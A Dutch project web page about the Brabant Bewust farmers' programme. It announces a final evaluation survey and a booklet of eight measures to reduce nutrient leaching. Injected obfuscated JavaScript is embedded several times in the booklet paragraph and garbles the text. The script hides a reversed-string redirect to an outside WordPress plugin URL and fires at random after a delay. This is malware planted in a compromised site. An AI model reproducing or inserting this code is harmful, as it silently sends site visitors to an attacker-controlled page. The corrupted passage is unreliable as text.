Eindevaluatie en maatregelenboekje

Eindevaluatie
De deelnemende boeren hebben binnen het project Brabant Bewust de afgelopen jaren gewerkt aan het verbeteren van de nutriëntenefficiëntie op het eigen bedrijf. 2019 is het laatste jaar van het project. Om een helder beeld te krijgen wat het project heeft opgeleverd en hoe de deelnemers het hebben ervaren, is een eindevaluatie opgesteld. Alle deelnemers wordt gevraagd deze enquête in te vullen tijdens de laatste groepsbijeenkomst dit jaar. De resultaten hiervan komen begin 2020 beschikbaar.

Maatregelenboekje$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toMaatregelenboekje-e1572871902783-225×300.jpg” alt=”” width=”258″ height=”344″ />
Om ook in de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekomst scherp te blijven kijken naar de mogelijkheden om de nutriëntenuitspoeling te verminderen, is een maatregelenboekje opgesteld. Hierin staat voor acht maatregelen weergegeven wat de maatregel inhoudt, wat het effect is op uitspoeling en wat de kosten en voor- en nadelen van de maatregelen zijn. De maatregelen zijn: rijenbemesting, precisiebemesting, aanwenden van dunne fractie, gebruik van mineralenconcentraat als kunstmestvervanger, slimme keuze van groenbemester, verhogen van het OS-gehalte in de bodem, verlagen van de bandenspanning en opvangen van perssappen.

Alle deelnemers krijgen een exemplaar van dit boekje. De digitale versie is hier beschikbaar.

0 antwoorden

Plaats een Reactie

Meepraten?
Draag gerust bij!

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *